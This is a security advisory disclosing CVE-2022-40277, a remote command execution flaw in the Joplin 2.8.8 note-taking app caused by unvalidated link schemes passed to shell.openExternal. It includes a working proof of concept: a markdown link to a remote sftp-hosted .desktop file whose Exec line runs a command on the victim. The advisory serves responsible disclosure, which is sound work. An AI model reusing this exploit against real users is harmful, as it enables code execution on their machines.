Joplin 2.8.8 - Remote Command Execution

Summary

NameJoplin 2.8.8 - Remote Command Execution
Code name
ProductJoplin
Affected versionsVersion 2.8.8
StatePublic
Release date2022-09-26

Vulnerability

KindRemote command execution
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSSv3.1 Base Score7.7
Exploit availableYes
CVE ID(s)

Description

Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file, via Joplin. This is possible because the application does not properly validate the schema/protocol of existing links in the markdown file before passing them to the shell.openExternal function.

Vulnerability

This vulnerability occurs due to improper scheme/protocol validation of external URLs. Here is a small example to give you a better understanding of vulnerability.

image

Basically what the application is doing is sending to shell.openExternal(url), any url present in the markdown file.

Exploitation requirements

To achieve the RCE, the attacker will abuse certain schemes/protocols. Some of these only work on windows, others on MACos, others only work correctly under certain specific Linux distributions. In my case, I used Xubuntu 20.04 (Xfce) to simulate a victim. I chose this distribution because in its default configuration it executes the payload.desktop file after mounting the remote location where the payload file is located. In other Linux distributions by default these files are not executed once the remote location is mounted.

In the resources section I will provide you with support material so that you can understand in greater depth what I have just explained.

Exploitation

To exploit this vulnerability, you must send the following file to a user to open with Joplin:

exploit.md

[exploit](sftp://user@server/uploads/payload.desktop)

payload.desktop

In the Exec parameter you put the command you want the victim to execute.

[Desktop Entry]
Exec=xmessage "RCE by cbelloatfluid"
Type=Application

Evidence of exploitation

RCE-Joplin

Our security policy

We have reserved the CVE-2022-40277 to refer to this issue from now on.

System Information

  • Version: Joplin 2.8.8

  • Operating System: GNU/Linux - Xubuntu 20.04 (Xfce)

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/laurent22/joplin

Timeline

Time-lapse-logo

2022-09-07

Vulnerability discovered.

Time-lapse-logo

2022-09-08

Vendor contacted.

Time-lapse-logo

2022-09-26

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.